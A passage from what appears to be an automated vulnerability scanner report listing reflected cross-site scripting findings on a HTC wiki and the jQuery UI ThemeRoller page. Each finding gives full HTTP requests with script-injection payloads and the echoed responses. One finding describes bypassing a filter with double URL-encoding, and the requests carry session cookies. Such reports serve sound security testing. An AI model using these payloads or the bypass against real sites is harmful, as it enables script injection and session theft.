The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 was submitted in the REST URL parameter 2. This input was echoed as b03df<script>alert(1)</script>58156201246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /account/scottpjb03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:07:36 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q1eFPEj9bv+7BfltWrJMEs; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=65C7BB98781E26CF5BC6008F3D3429ED; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:07:36 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Smartphone Wiki</title>

   <meta name="description" content="HTC
...[SNIP]...
<i>scottpjb03df<script>alert(1)</script>58156201246</i>
...[SNIP]...

4.30. http://htcwiki.wetpaint.com/xml/metadata/WELCOME_ANNOUNCEMENT [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://htcwiki.wetpaint.com
Path:   /xml/metadata/WELCOME_ANNOUNCEMENT

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1214<a>0a9fac97bad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /xml/metadata/WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad HTTP/1.1
Host: htcwiki.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wab=joinButton=40; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; JSESSIONID=45096302F9EFFF131068FF023F65C0BA; wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; dwm=1; pvc=1; WPC-action=; apc=tzo=21600000

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:04 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=8B146C25F56ABEDF2E3CA5EA6487F687; Path=/
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:59:04 GMT
Vary: Accept-Encoding
Content-Type: text/xml;charset=UTF-8
Content-Length: 3791

<?xml version="1.0" encoding="UTF-8"?><error status="2002985068"><message>No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214&lt;a&gt;0a9fac97bad</message><stack><![CDATA[java.lang.IllegalArgumentException: No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad    at java.lang.Enum.valueOf(Enum.java:196)    at com.wetpaint.type.MetadataName.valueOf(MetadataName.java:3)    at com.wetpaint.api.action.WikiDatumAction.executeGet(WikiDatumAction.java:39)    at com.wetpaint.a
...[SNIP]...

4.31. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd697"><script>alert(1)</script>0e06b0d0009 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9cd697"><script>alert(1)</script>0e06b0d0009&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9cd697"><script>alert(1)</script>0e06b0d0009&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55
...[SNIP]...

4.32. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a43"><script>alert(1)</script>5df749b98b5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd86a43"><script>alert(1)</script>5df749b98b5&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd86a43"><script>alert(1)</script>5df749b98b5&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85
...[SNIP]...

4.33. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a4f5"><script>alert(1)</script>14b71544016 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc1a4f5"><script>alert(1)</script>14b71544016&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc1a4f5"><script>alert(1)</script>14b71544016&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

4.34. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcf1"><script>alert(1)</script>0d3c47e2367 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecfdcf1"><script>alert(1)</script>0d3c47e2367&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecfdcf1"><script>alert(1)</script>0d3c47e2367&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

4.35. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f53"><script>alert(1)</script>2c480b0a63e was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc41f53"><script>alert(1)</script>2c480b0a63e&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc41f53"><script>alert(1)</script>2c480b0a63e&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100
...[SNIP]...

4.36. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9d"><script>alert(1)</script>7040f13f8da was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec8838c9d"><script>alert(1)</script>7040f13f8da&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec8838c9d"><script>alert(1)</script>7040f13f8da&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&bo
...[SNIP]...

4.37. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f09db"><script>alert(1)</script>f9cc1bf1ccd was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5f09db"><script>alert(1)</script>f9cc1bf1ccd&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5f09db"><script>alert(1)</script>f9cc1bf1ccd&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorA
...[SNIP]...

4.38. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91800"><script>alert(1)</script>56b1ce80b05 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

